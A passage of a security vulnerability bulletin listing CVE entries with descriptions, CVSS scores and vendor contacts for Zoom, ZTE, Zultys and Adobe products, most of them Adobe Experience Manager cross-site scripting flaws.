zoom — multiple_products Improper access control in Zoom Mobile App for iOS and Zoom SDKs for iOS before version 5.16.5 may allow an authenticated user to conduct a disclosure of information via network access. 2023-12-13 7.1 CVE-2023-43585
security@zoom.us
zoom — multiple_products Path traversal in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows may allow an authenticated user to conduct an escalation of privilege via network access. 2023-12-13 7.3 CVE-2023-43586
security@zoom.us
zte — mc801a There is a command injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of multiple network parameters, an authenticated attacker could use the vulnerability to execute arbitrary commands. 2023-12-14 8.4 CVE-2023-25643
psirt@zte.com.cn
zultys — multiple_products A SQL injection vulnerability in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an authenticated attacker to execute arbitrary SQL queries on the backend database via the filter parameter in requests to the /newapi/ endpoint in the Zultys MX web interface. 2023-12-08 8.8 CVE-2023-43743
cve@mitre.org
cve@mitre.org
zultys — mx-se_firmware An authentication bypass in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an unauthenticated attacker to obtain an administrative session via a protection mechanism failure in the authentication function. In normal operation, the Zultys MX Administrator Windows client connects to port 7505 and attempts authentication, submitting the administrator username and password to the server. Upon authentication failure, the server sends a login failure message prompting the client to disconnect. However, if the client ignores the failure message instead and attempts to continue, the server does not forcibly close the connection and processes all subsequent requests from the client as if authentication had been successful. 2023-12-08 9.8 CVE-2023-43742
cve@mitre.org
zultys — mx-se_firmware An OS command injection vulnerability in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an administrator to execute arbitrary OS commands via a file name parameter in a patch application function. The Zultys MX Administrator client has a “Patch Manager” section that allows administrators to apply patches to the device. The user supplied filename for the patch file is passed to a shell script without validation. Including bash command substitution characters in a patch file name results in execution of the provided command. 2023-12-08 7.2 CVE-2023-43744
cve@mitre.org
cve@mitre.org

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
adobe — after_effects Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-48635
psirt@adobe.com
adobe — css-tools @adobe/css-tools versions 4.3.1 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS. 2023-12-14 5.3 CVE-2023-48631
psirt@adobe.com
adobe — dimension Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47061
psirt@adobe.com
adobe — dimension Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47062
psirt@adobe.com
adobe — dimension Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47078
psirt@adobe.com
adobe — dimension Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47079
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-47064
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-47065
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48440
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction. 2023-12-15 5.3 CVE-2023-48441
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48442
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48443
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48444
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48445
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48446
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48447
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48448
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48449
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48450
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48451
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48452
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48453
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48454
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48455
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48456
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48457
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48458
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48459
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48460
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48461
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48462
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48463
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48464
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48465
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48466
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48467
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48468
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48469
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48470
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48471
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48472
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48473
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48474
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48475
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48476
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48477
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48478
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48479
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48480
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48481
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48482
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48483
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48484
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48485
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48486
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48487
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48488
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48489
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48490
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48491
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48492
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48493
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48494
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48495
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48496
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48497
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48498
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48499
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48500
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48501
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48502
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48503
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48504
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48505
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48506
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48507
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48508
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48509
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48510
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48511
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48512
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48513
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48514
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48515
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48516
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48517
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48518
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48519
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48520
psirt@adobe.com
